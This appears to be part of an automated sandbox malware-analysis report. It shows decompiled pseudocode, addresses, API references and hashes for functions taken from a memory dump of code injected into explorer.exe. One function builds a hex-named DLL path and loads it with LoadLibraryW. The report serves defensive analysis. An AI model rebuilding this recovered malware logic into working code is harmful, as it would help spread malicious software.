                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b434b
                                                                                                                                                                        0x007b4354
                                                                                                                                                                        0x007b4354
                                                                                                                                                                        0x007b4347
                                                                                                                                                                        0x007b4342
                                                                                                                                                                        0x007b433a
                                                                                                                                                                        0x007b4326
                                                                                                                                                                        0x007b432f
                                                                                                                                                                        0x007b432f

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: 4c82e41e9aaf146577cc108026d03d18190198631e5c0346b1ef51fd4dc6abbf
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 05D10371A007049FCB24CF6DD8C4AAAB7E5FF98304B28896DE88AC7702D735E945CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B19A9 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-1155366105
                                                                                                                                                                        • Opcode ID: 7f1af1f36f8ff582b57b669276bf22abd65b1f74bc63a8052c1b73d4b2846b06
                                                                                                                                                                        • Instruction ID: 158778a6d568b12b5a714f433bfcab3ff705a3eac3385212c028114a26821629
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f1af1f36f8ff582b57b669276bf22abd65b1f74bc63a8052c1b73d4b2846b06
                                                                                                                                                                        • Instruction Fuzzy Hash: 8141D8B160024EA7DB284EAC9DBDBFF3A59DF01310FD44066FA16E6281E26DDD90D2D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AD218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E007AD218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x7bf81c; // 0x7d0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E007A9DF2(_t50, 0x392);
					_t66 =  *0x7bf81c; // 0x7d0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E007A9E51( &_v140, 0x40, L"%08x", E007AE2C5(_t66 + 0xb0, E007AA43D(_t66 + 0xb0), 0));
					_t20 =  *0x7bf81c; // 0x7d0000
					asm("sbb eax, eax");
					_t25 = E007A9DF2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000a0b) + 0xf8);
					_t26 =  *0x7bf81c; // 0x7d0000
					_t68 = E007A9A5A(_t26 + 0x1020);
					_v12 = _t68;
					E007A8BAF( &_v8);
					_t32 =  *0x7bf81c; // 0x7d0000
					_t34 = E007A9A5A(_t32 + 0x122a);
					 *0x7bf91c = _t34;
					_t35 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x7bc9a0,  &_v140, ".", L"dll", 0, 0x7bc9a0, _t25, 0x7bc9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x7bf91c);
					 *0x7bf914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E007AF011(0x7bcb8c, _t60);
					}
					 *0x7bf918 = _t38;
					E007A8BF4( &_v12, 0xfffffffe);
					E007A8D6D( &_v140, 0, 0x80);
					if( *0x7bf918 != 0) {
						goto L10;
					} else {
						E007A8BF4(0x7bf91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x7bf918 == 0) {
						_t46 =  *0x7bf850; // 0xeaf808
						 *0x7bf918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                        0x007ad218
                                                                                                                                                                        0x007ad218
                                                                                                                                                                        0x007ad218
                                                                                                                                                                        0x007ad21b
                                                                                                                                                                        0x007ad227
                                                                                                                                                                        0x007ad232
                                                                                                                                                                        0x007ad24e
                                                                                                                                                                        0x007ad253
                                                                                                                                                                        0x007ad25c
                                                                                                                                                                        0x007ad25e
                                                                                                                                                                        0x007ad266
                                                                                                                                                                        0x007ad287
                                                                                                                                                                        0x007ad28c
                                                                                                                                                                        0x007ad299
                                                                                                                                                                        0x007ad2a6
                                                                                                                                                                        0x007ad2b4
                                                                                                                                                                        0x007ad2c5
                                                                                                                                                                        0x007ad2cb
                                                                                                                                                                        0x007ad2ce
                                                                                                                                                                        0x007ad2e5
                                                                                                                                                                        0x007ad2f1
                                                                                                                                                                        0x007ad2f9
                                                                                                                                                                        0x007ad300
                                                                                                                                                                        0x007ad306
                                                                                                                                                                        0x007ad312
                                                                                                                                                                        0x007ad318
                                                                                                                                                                        0x007ad31f
                                                                                                                                                                        0x007ad332
                                                                                                                                                                        0x007ad321
                                                                                                                                                                        0x007ad321
                                                                                                                                                                        0x007ad324
                                                                                                                                                                        0x007ad32a
                                                                                                                                                                        0x007ad32f
                                                                                                                                                                        0x007ad334
                                                                                                                                                                        0x007ad33f
                                                                                                                                                                        0x007ad351
                                                                                                                                                                        0x007ad363
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad365
                                                                                                                                                                        0x007ad36c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad372
                                                                                                                                                                        0x007ad373
                                                                                                                                                                        0x007ad373
                                                                                                                                                                        0x007ad37a
                                                                                                                                                                        0x007ad37c
                                                                                                                                                                        0x007ad381
                                                                                                                                                                        0x007ad381
                                                                                                                                                                        0x007ad386
                                                                                                                                                                        0x007ad38a
                                                                                                                                                                        0x007ad38a

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 7011f57dce779352a811a248c8cd49b147a9c4d9447b8fc84fb3442fe74f9e3f
                                                                                                                                                                        • Instruction ID: e4e55f8742113d6495103cf0802d92f2c4a1ebb01000550ee378b8e76a159804
                                                                                                                                                                        • Opcode Fuzzy Hash: 7011f57dce779352a811a248c8cd49b147a9c4d9447b8fc84fb3442fe74f9e3f
                                                                                                                                                                        • Instruction Fuzzy Hash: C83180B2600504FFDB209B69EC49FDA32ACE786710F10C335F115D7191DA7C9E458769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B3674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E007B3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E007B358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E007AA43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x7bcf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x7bcf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L007B8935();
				return _t29 - _t22;
			}

















                                                                                                                                                                        0x007b3674
                                                                                                                                                                        0x007b367f
                                                                                                                                                                        0x007b3686
                                                                                                                                                                        0x007b368d
                                                                                                                                                                        0x007b3693
                                                                                                                                                                        0x007b369b
                                                                                                                                                                        0x007b369c
                                                                                                                                                                        0x007b369e
                                                                                                                                                                        0x007b36a3
                                                                                                                                                                        0x007b36ab
                                                                                                                                                                        0x007b36ab
                                                                                                                                                                        0x007b36ae
                                                                                                                                                                        0x007b36b2
                                                                                                                                                                        0x007b36a5
                                                                                                                                                                        0x007b36a5
                                                                                                                                                                        0x007b36a9
                                                                                                                                                                        0x007b36ab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b36ab
                                                                                                                                                                        0x007b36a9
                                                                                                                                                                        0x007b36bb
                                                                                                                                                                        0x007b36c4
                                                                                                                                                                        0x007b36c9
                                                                                                                                                                        0x007b36cc
                                                                                                                                                                        0x007b36cf
                                                                                                                                                                        0x007b36d2
                                                                                                                                                                        0x007b36d4
                                                                                                                                                                        0x007b36d4
                                                                                                                                                                        0x007b36da
                                                                                                                                                                        0x007b36dd
                                                                                                                                                                        0x007b36e0
                                                                                                                                                                        0x007b36e3
                                                                                                                                                                        0x007b36e8
                                                                                                                                                                        0x007b36ea
                                                                                                                                                                        0x007b36ea
                                                                                                                                                                        0x007b36f0
                                                                                                                                                                        0x007b36fc
                                                                                                                                                                        0x007b36fe
                                                                                                                                                                        0x007b370a

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 007B36BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 007B36FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: c7f653c49828070a857854ca3358ebed315098dafd5eec49469d251f66b3896d
                                                                                                                                                                        • Instruction ID: 3aaf3107e19acc2ef368db408f6b4c510f862ab69e70df359c3cb5663d8e6f09
                                                                                                                                                                        • Opcode Fuzzy Hash: c7f653c49828070a857854ca3358ebed315098dafd5eec49469d251f66b3896d
                                                                                                                                                                        • Instruction Fuzzy Hash: 80114C32A00249BBCF009F68EC096DD7F75FF94310F128669E92093241EF34C2A4C745
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%